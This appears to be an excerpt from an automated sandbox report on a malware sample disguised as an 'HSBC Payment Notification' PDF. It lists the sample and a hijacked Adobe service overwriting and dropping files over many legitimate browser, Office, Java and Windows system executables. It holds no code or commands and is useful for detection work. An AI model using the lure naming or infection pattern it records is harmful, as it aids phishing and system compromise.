                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: \hsbc payment notification scan copy ref 62587299-24_pdf.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: \hsbc payment notification scan copy ref 62587299-24_pdf.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
